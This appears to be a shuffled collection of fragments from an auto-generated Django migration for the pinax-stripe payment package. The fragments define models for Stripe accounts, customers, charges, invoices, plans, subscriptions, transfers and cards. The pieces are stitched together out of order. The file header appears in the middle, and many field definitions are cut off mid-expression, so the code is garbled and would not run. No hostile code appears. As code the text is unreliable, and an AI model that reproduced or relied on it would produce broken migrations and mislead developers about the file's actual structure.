models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_publishable_key', models.CharField(blank=True,", "models.TextField(blank=True, null=True)), ('legal_entity_maiden_name', models.TextField(blank=True, null=True)), ('legal_entity_personal_id_number_provided', models.BooleanField(default=False)), ('legal_entity_phone_number', models.TextField(blank=True, null=True)), ('legal_entity_ssn_last_4_provided', models.BooleanField(default=False)), ('legal_entity_type',", "), migrations.CreateModel( name='Customer', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at',", "models.PositiveIntegerField(default=0)), ('bitcoin_uri', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('description', models.TextField(blank=True)), ('email', models.TextField(blank=True)), ('filled', models.BooleanField(default=False)), ('inbound_address',", "models.CharField(blank=True, max_length=100)), ('currency', models.CharField(default='usd', max_length=10)), ('amount', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('amount_refunded', models.DecimalField(blank=True, decimal_places=2,", "by Django 1.11.8 on 2018-08-06 19:00 from __future__ import unicode_literals from decimal import", "to='pinax_stripe.Invoice')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Plan', fields=[ ('id', models.CharField(editable=False, max_length=32,", "('pending_webhooks', models.PositiveIntegerField(default=0)), ('api_version', models.CharField(blank=True, max_length=100)), ('customer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('stripe_account', models.ForeignKey(blank=True, default=None,", "max_digits=9, 
null=True)), ('description', models.TextField(blank=True)), ('paid', models.NullBooleanField()), ('disputed', models.NullBooleanField()), ('refunded', models.NullBooleanField()), ('captured', models.NullBooleanField()), ('receipt_sent',", "models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(max_length=15)), ('interval', models.CharField(max_length=15)), ('interval_count', models.IntegerField()), ('name', models.CharField(max_length=150)), ('statement_descriptor',", "default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False,", "migrations, models import django.db.models.deletion import django.utils.timezone import jsonfield.fields import pinax.stripe.models class Migration(migrations.Migration): initial", "('duration', models.CharField(default='once', max_length=10)), ('duration_in_months', models.PositiveIntegerField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('max_redemptions', models.PositiveIntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True,", "migrations.AddField( model_name='customer', name='users', field=models.ManyToManyField(related_name='customers', related_query_name='customers', through='pinax_stripe.UserAccount', to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='charge', name='customer', field=models.ForeignKey(blank=True, null=True,", "models.BooleanField(default=False)), ('verification_disabled_reason', models.TextField(blank=True, null=True)), ('verification_due_by', models.DateTimeField(blank=True, null=True)), ('verification_timestamp', models.DateTimeField(blank=True, null=True)), ('verification_fields_needed', jsonfield.fields.JSONField(blank=True, null=True)),", 
"models.TextField(blank=True)), ('address_line_1', models.TextField(blank=True)), ('address_line_1_check', models.CharField(max_length=15)), ('address_line_2', models.TextField(blank=True)), ('address_city', models.TextField(blank=True)), ('address_state', models.TextField(blank=True)), ('address_country', models.TextField(blank=True)),", "('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_off', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(default='usd', max_length=10)), ('duration', models.CharField(default='once', max_length=10)),", "models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_balance', models.DecimalField(blank=True, decimal_places=2, max_digits=9,", "('payouts_enabled', models.BooleanField(default=False)), ('verification_disabled_reason', models.TextField(blank=True, null=True)), ('verification_due_by', models.DateTimeField(blank=True, null=True)), ('verification_timestamp', models.DateTimeField(blank=True, null=True)), ('verification_fields_needed', jsonfield.fields.JSONField(blank=True,", "import settings from django.db import migrations, models import django.db.models.deletion import django.utils.timezone import jsonfield.fields", "('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('application_fee_percent', models.DecimalField(blank=True, decimal_places=2, default=None, max_digits=3, null=True)), ('cancel_at_period_end', models.BooleanField(default=False)), ('canceled_at', models.DateTimeField(blank=True, null=True)),", "('verification_fields_needed', jsonfield.fields.JSONField(blank=True, null=True)), ('authorized', models.BooleanField(default=True)), ('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, 
related_name='stripe_accounts', to=settings.AUTH_USER_MODEL)), ], options={", "name='UserAccount', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Account')), ('customer',", "null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='customer', name='users', field=models.ManyToManyField(related_name='customers', related_query_name='customers', through='pinax_stripe.UserAccount', to=settings.AUTH_USER_MODEL), ), migrations.AddField(", "('currency', models.CharField(default='usd', max_length=10)), ('amount', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('amount_refunded', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),", "models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('fee_currency', models.CharField(blank=True, max_length=10, null=True)), ('transfer_group', models.TextField(blank=True, null=True)), ('outcome', jsonfield.fields.JSONField(blank=True,", "on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Customer'), ), migrations.AddField( model_name='charge', name='invoice', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Invoice'), ),", "models.TextField(blank=True)), ('paid', models.NullBooleanField()), ('disputed', models.NullBooleanField()), ('refunded', models.NullBooleanField()), ('captured', models.NullBooleanField()), ('receipt_sent', models.BooleanField(default=False)), ('charge_created', models.DateTimeField(blank=True,", "('details_submitted', models.BooleanField(default=False)), ('display_name', models.TextField(blank=True, null=True)), ('email', models.TextField(blank=True, 
null=True)), ('legal_entity_address_city', models.TextField(blank=True, null=True)), ('legal_entity_address_country', models.TextField(blank=True,", "('fee_currency', models.CharField(blank=True, max_length=10, null=True)), ('transfer_group', models.TextField(blank=True, null=True)), ('outcome', jsonfield.fields.JSONField(blank=True, null=True)), ], options={ 'abstract':", "null=True)), ('charge', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Charge')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Customer')), ], options={", "models.TextField(blank=True, null=True)), ('failure_code', models.TextField(blank=True, null=True)), ('failure_message', models.TextField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)),", "null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='invoice', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField(", "models.TextField()), ('message', models.CharField(max_length=500)), ('traceback', models.TextField()), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Event')), ],", "models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('business_name', models.TextField(blank=True, null=True)), ('business_url', models.TextField(blank=True, null=True)), ('charges_enabled', models.BooleanField(default=False)), ('country',", "('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_account', 
models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False,", "], options={ 'abstract': False, }, ), migrations.CreateModel( name='EventProcessingException', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True,", "True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Account', fields=[ ('id',", "models.TextField(blank=True, null=True)), ('support_email', models.TextField(blank=True, null=True)), ('support_phone', models.TextField(blank=True, null=True)), ('timezone', models.TextField(blank=True, null=True)), ('tos_acceptance_date', models.DateField(blank=True,", "('account_holder_name', models.TextField()), ('account_holder_type', models.TextField()), ('bank_name', models.TextField(blank=True, null=True)), ('country', models.TextField()), ('currency', models.TextField()), ('default_for_currency', models.BooleanField(default=False)),", "null=True)), ('payout_schedule_monthly_anchor', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_weekly_anchor', models.TextField(blank=True, null=True)), ('payout_statement_descriptor', models.TextField(blank=True, null=True)), ('payouts_enabled', models.BooleanField(default=False)), ('verification_disabled_reason',", "primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_off', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency',", "models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('total', models.DecimalField(decimal_places=2, max_digits=9)), ('date', models.DateTimeField()), ('webhooks_delivered_at', models.DateTimeField(blank=True, null=True)), ('charge',", "models.TextField(blank=True, null=True)), ('destination', 
models.TextField(blank=True, null=True)), ('destination_payment', models.TextField(blank=True, null=True)), ('failure_code', models.TextField(blank=True, null=True)), ('failure_message', models.TextField(blank=True,", "('ended_at', models.DateTimeField(blank=True, null=True)), ('quantity', models.IntegerField()), ('start', models.DateTimeField()), ('status', models.CharField(max_length=25)), ('trial_end', models.DateTimeField(blank=True, null=True)), ('trial_start',", "utf-8 -*- # Generated by Django 1.11.8 on 2018-08-06 19:00 from __future__ import", "models.CharField(max_length=15)), ('last4', models.CharField(blank=True, max_length=4)), ('fingerprint', models.TextField()), ], options={ 'abstract': False, }, ), migrations.CreateModel(", "models.BooleanField(default=False)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('method', models.TextField(blank=True, null=True)), ('reversed', models.BooleanField(default=False)), ('source_transaction', models.TextField(blank=True, null=True)), ('source_type',", "), migrations.CreateModel( name='TransferChargeFee', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency',", "max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('business_name', models.TextField(blank=True, null=True)), ('business_url', models.TextField(blank=True,", "bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Coupon', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191,", "models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', 
models.DateTimeField(default=django.utils.timezone.now)), ('amount_due', models.DecimalField(decimal_places=2, max_digits=9)), ('attempted',", "fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('data', models.TextField()), ('message', models.CharField(max_length=500)), ('traceback', models.TextField()), ('created_at',", "('amount_refunded', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('description', models.TextField(blank=True)), ('paid', models.NullBooleanField()), ('disputed', models.NullBooleanField()), ('refunded', models.NullBooleanField()),", "to='pinax_stripe.Customer')), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='InvoiceItem', fields=[ ('id',", "null=True)), ('legal_entity_verification_document', models.TextField(blank=True, null=True)), ('legal_entity_verification_status', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)),", "related_name='items', to='pinax_stripe.Invoice')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Plan', fields=[ ('id', models.CharField(editable=False,", "'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Transfer', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True,", "django.db import migrations, models import django.db.models.deletion import django.utils.timezone import jsonfield.fields import pinax.stripe.models class", "primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('source', models.CharField(blank=True, max_length=100)), ('currency', models.CharField(default='usd', max_length=10)),", 
"serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('active', models.BooleanField(default=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_received', models.DecimalField(decimal_places=2,", "[ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Account', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True,", "max_length=4)), ('tokenization_method', models.CharField(blank=True, max_length=15)), ('exp_month', models.IntegerField()), ('exp_year', models.IntegerField()), ('funding', models.CharField(max_length=15)), ('last4', models.CharField(blank=True, max_length=4)),", "null=True)), ('tos_acceptance_date', models.DateField(blank=True, null=True)), ('tos_acceptance_ip', models.TextField(blank=True, null=True)), ('tos_acceptance_user_agent', models.TextField(blank=True, null=True)), ('payout_schedule_delay_days', models.PositiveSmallIntegerField(blank=True, null=True)),", "max_length=10)), ('amount', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('amount_refunded', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('description', models.TextField(blank=True)),", "models.DateTimeField(default=django.utils.timezone.now)), ('source', models.CharField(blank=True, max_length=100)), ('currency', models.CharField(default='usd', max_length=10)), ('amount', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('amount_refunded',", "migrations.CreateModel( name='Invoice', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)),", "fields=[ ('id', models.CharField(editable=False, max_length=32, 
primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_due', models.DecimalField(decimal_places=2,", "models.CharField(max_length=15)), ('interval', models.CharField(max_length=15)), ('interval_count', models.IntegerField()), ('name', models.CharField(max_length=150)), ('statement_descriptor', models.TextField(blank=True)), ('trial_period_days', models.IntegerField(blank=True, null=True)), ('metadata',", "migrations.CreateModel( name='UserAccount', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Account')),", "null=True)), ('amount_refunded', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('description', models.TextField(blank=True)), ('paid', models.NullBooleanField()), ('disputed', models.NullBooleanField()), ('refunded',", "('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('method', models.TextField(blank=True, null=True)), ('reversed', models.BooleanField(default=False)), ('source_transaction', models.TextField(blank=True, null=True)), ('source_type', models.TextField(blank=True,", "null=True)), ('payout_schedule_weekly_anchor', models.TextField(blank=True, null=True)), ('payout_statement_descriptor', models.TextField(blank=True, null=True)), ('payouts_enabled', models.BooleanField(default=False)), ('verification_disabled_reason', models.TextField(blank=True, null=True)), ('verification_due_by',", "null=True)), ('country', models.TextField()), ('currency', models.TextField()), ('default_for_currency', models.BooleanField(default=False)), ('fingerprint', models.TextField()), ('last4', models.CharField(max_length=4)), ('metadata', jsonfield.fields.JSONField(blank=True,", "('created_at', 
models.DateTimeField(default=django.utils.timezone.now)), ('kind', models.CharField(max_length=250)), ('livemode', models.BooleanField(default=False)), ('webhook_message', jsonfield.fields.JSONField()), ('validated_message', jsonfield.fields.JSONField(blank=True, null=True)), ('valid', models.NullBooleanField()),", "options={ 'abstract': False, }, ), migrations.CreateModel( name='UserAccount', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),", "('bank_name', models.TextField(blank=True, null=True)), ('country', models.TextField()), ('currency', models.TextField()), ('default_for_currency', models.BooleanField(default=False)), ('fingerprint', models.TextField()), ('last4', models.CharField(max_length=4)),", "null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Event')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Invoice', fields=[ ('id',", "('failure_message', models.TextField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('method', models.TextField(blank=True, null=True)), ('reversed', models.BooleanField(default=False)),", "models.CharField(default='usd', max_length=10)), ('description', models.TextField(blank=True)), ('email', models.TextField(blank=True)), ('filled', models.BooleanField(default=False)), ('inbound_address', models.TextField(blank=True)), ('payment', models.TextField(blank=True)), ('refund_address',", "max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=255)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)),", "options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Transfer', fields=[ 
('id', models.CharField(editable=False, max_length=32,", "2018-08-06 19:00 from __future__ import unicode_literals from decimal import Decimal from django.conf import", "('email', models.TextField(blank=True, null=True)), ('legal_entity_address_city', models.TextField(blank=True, null=True)), ('legal_entity_address_country', models.TextField(blank=True, null=True)), ('legal_entity_address_line1', models.TextField(blank=True, null=True)), ('legal_entity_address_line2',", "('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('name', models.TextField(blank=True)), ('address_line_1', models.TextField(blank=True)), ('address_line_1_check', models.CharField(max_length=15)), ('address_line_2', models.TextField(blank=True)), ('address_city', models.TextField(blank=True)), ('address_state',", "models.TextField(blank=True, null=True)), ('legal_entity_address_line2', models.TextField(blank=True, null=True)), ('legal_entity_address_postal_code', models.TextField(blank=True, null=True)), ('legal_entity_address_state', models.TextField(blank=True, null=True)), ('legal_entity_dob', models.DateField(blank=True,", "('charge', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Charge')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Customer')), ], options={ 'abstract':", "models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('application', models.TextField(blank=True, null=True)), ('description', models.TextField(blank=True, null=True)), ('kind', models.CharField(max_length=150)),", "related_name='charges', to='pinax_stripe.Invoice'), ), migrations.AddField( model_name='card', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AddField( model_name='bitcoinreceiver', 
name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,", "('tos_acceptance_user_agent', models.TextField(blank=True, null=True)), ('payout_schedule_delay_days', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_interval', models.CharField(blank=True, choices=[('Manual', 'manual'), ('Daily', 'daily'), ('Weekly',", "null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('status', models.CharField(max_length=25)), ('transfer_group', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)), ('event',", "), migrations.CreateModel( name='Subscription', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at',", "max_digits=9)), ('date', models.DateTimeField()), ('webhooks_delivered_at', models.DateTimeField(blank=True, null=True)), ('charge', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Charge')), ('customer',", "models.DecimalField(decimal_places=2, max_digits=9)), ('amount_reversed', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('application_fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('created',", "Decimal from django.conf import settings from django.db import migrations, models import django.db.models.deletion import", "null=True)), ('support_phone', models.TextField(blank=True, null=True)), ('timezone', models.TextField(blank=True, null=True)), ('tos_acceptance_date', models.DateField(blank=True, null=True)), ('tos_acceptance_ip', models.TextField(blank=True, null=True)),", "('fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('fee_currency', models.CharField(blank=True, max_length=10, null=True)), ('transfer_group', models.TextField(blank=True, 
null=True)), ('outcome',", "('attempt_count', models.PositiveIntegerField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('closed', models.BooleanField(default=False)), ('description', models.TextField(blank=True)), ('paid',", "null=True)), ('quantity', models.IntegerField()), ('start', models.DateTimeField()), ('status', models.CharField(max_length=25)), ('trial_end', models.DateTimeField(blank=True, null=True)), ('trial_start', models.DateTimeField(blank=True, null=True)),", "models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('kind', models.CharField(max_length=250)), ('livemode', models.BooleanField(default=False)), ('webhook_message', jsonfield.fields.JSONField()), ('validated_message', jsonfield.fields.JSONField(blank=True, null=True)),", "models.Model), ), migrations.CreateModel( name='InvoiceItem', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=255)), ('created_at',", "null=True)), ('application_fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('created', models.DateTimeField(blank=True, null=True)), ('currency', models.CharField(default='usd', max_length=25)), ('date',", "models.NullBooleanField()), ('processed', models.BooleanField(default=False)), ('request', models.CharField(blank=True, max_length=100)), ('pending_webhooks', models.PositiveIntegerField(default=0)), ('api_version', models.CharField(blank=True, max_length=100)), ('customer', models.ForeignKey(blank=True,", "jsonfield.fields.JSONField()), ('validated_message', jsonfield.fields.JSONField(blank=True, null=True)), ('valid', models.NullBooleanField()), ('processed', models.BooleanField(default=False)), ('request', models.CharField(blank=True, max_length=100)), ('pending_webhooks', 
models.PositiveIntegerField(default=0)),", "null=True, on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Charge')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Customer')), ], options={ 'abstract': False, },", "models.TextField()), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Event')), ], options={ 'abstract': False, },", "to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Subscription', fields=[ ('id', models.CharField(editable=False, max_length=32,", "fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('active', models.BooleanField(default=False)),", "models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(max_length=15)),", "unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('kind', models.CharField(max_length=250)), ('livemode', models.BooleanField(default=False)), ('webhook_message', jsonfield.fields.JSONField()), ('validated_message', jsonfield.fields.JSONField(blank=True, null=True)), ('valid',", "('receipt_number', models.TextField(blank=True)), ('period_end', models.DateTimeField()), ('period_start', models.DateTimeField()), ('subtotal', models.DecimalField(decimal_places=2, max_digits=9)), ('tax', models.DecimalField(blank=True, decimal_places=2, max_digits=9,", "}, ), migrations.CreateModel( 
name='TransferChargeFee', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)),", "null=True)), ('legal_entity_personal_id_number_provided', models.BooleanField(default=False)), ('legal_entity_phone_number', models.TextField(blank=True, null=True)), ('legal_entity_ssn_last_4_provided', models.BooleanField(default=False)), ('legal_entity_type', models.TextField(blank=True, null=True)), ('legal_entity_verification_details', models.TextField(blank=True,", "related_name='invoices', to='pinax_stripe.Charge')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Customer')), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model),", "('interval_count', models.IntegerField()), ('name', models.CharField(max_length=150)), ('statement_descriptor', models.TextField(blank=True)), ('trial_period_days', models.IntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_account',", "models.CharField(max_length=191)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(max_length=15)), ('interval', models.CharField(max_length=15)), ('interval_count', models.IntegerField()), ('name',", "('currency', models.TextField()), ('default_for_currency', models.BooleanField(default=False)), ('fingerprint', models.TextField()), ('last4', models.CharField(max_length=4)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('routing_number', models.TextField()),", "('amount_due', models.DecimalField(decimal_places=2, max_digits=9)), ('attempted', models.NullBooleanField()), ('attempt_count', models.PositiveIntegerField(blank=True, null=True)), ('statement_descriptor', 
models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)),", "('legal_entity_personal_id_number_provided', models.BooleanField(default=False)), ('legal_entity_phone_number', models.TextField(blank=True, null=True)), ('legal_entity_ssn_last_4_provided', models.BooleanField(default=False)), ('legal_entity_type', models.TextField(blank=True, null=True)), ('legal_entity_verification_details', models.TextField(blank=True, null=True)),", "fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('source', models.CharField(blank=True,", "('legal_entity_address_country', models.TextField(blank=True, null=True)), ('legal_entity_address_line1', models.TextField(blank=True, null=True)), ('legal_entity_address_line2', models.TextField(blank=True, null=True)), ('legal_entity_address_postal_code', models.TextField(blank=True, null=True)), ('legal_entity_address_state',", "('created', models.DateTimeField(blank=True, null=True)), ('currency', models.CharField(default='usd', max_length=25)), ('date', models.DateTimeField()), ('description', models.TextField(blank=True, null=True)), ('destination', models.TextField(blank=True,", "models.TextField(blank=True, null=True)), ('source_type', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('status', models.CharField(max_length=25)), ('transfer_group', models.TextField(blank=True, null=True)),", "models.DateTimeField(blank=True, null=True)), ('ended_at', models.DateTimeField(blank=True, null=True)), ('quantity', models.IntegerField()), ('start', models.DateTimeField()), ('status', models.CharField(max_length=25)), ('trial_end', models.DateTimeField(blank=True,", "models.CharField(blank=True, max_length=2)), ('cvc_check', models.CharField(blank=True, max_length=15)), 
('dynamic_last4', models.CharField(blank=True, max_length=4)), ('tokenization_method', models.CharField(blank=True, max_length=15)), ('exp_month', models.IntegerField()),", "('application', models.TextField(blank=True, null=True)), ('description', models.TextField(blank=True, null=True)), ('kind', models.CharField(max_length=150)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('transfer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='charge_fee_details',", "field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='customer', name='users', field=models.ManyToManyField(related_name='customers', related_query_name='customers', through='pinax_stripe.UserAccount', to=settings.AUTH_USER_MODEL), ),", "models.BooleanField(default=False)), ('available_on', models.DateTimeField(blank=True, null=True)), ('fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('fee_currency', models.CharField(blank=True, max_length=10, null=True)),", "('tax', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('tax_percent', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('total', models.DecimalField(decimal_places=2, max_digits=9)),", "], ), migrations.AddField( model_name='invoiceitem', name='plan', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan'), ), migrations.AddField( model_name='invoiceitem', name='subscription',", "models.TextField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('method', models.TextField(blank=True, null=True)), ('reversed', models.BooleanField(default=False)), ('source_transaction',", "null=True)), ('event', models.ForeignKey(blank=True, null=True, 
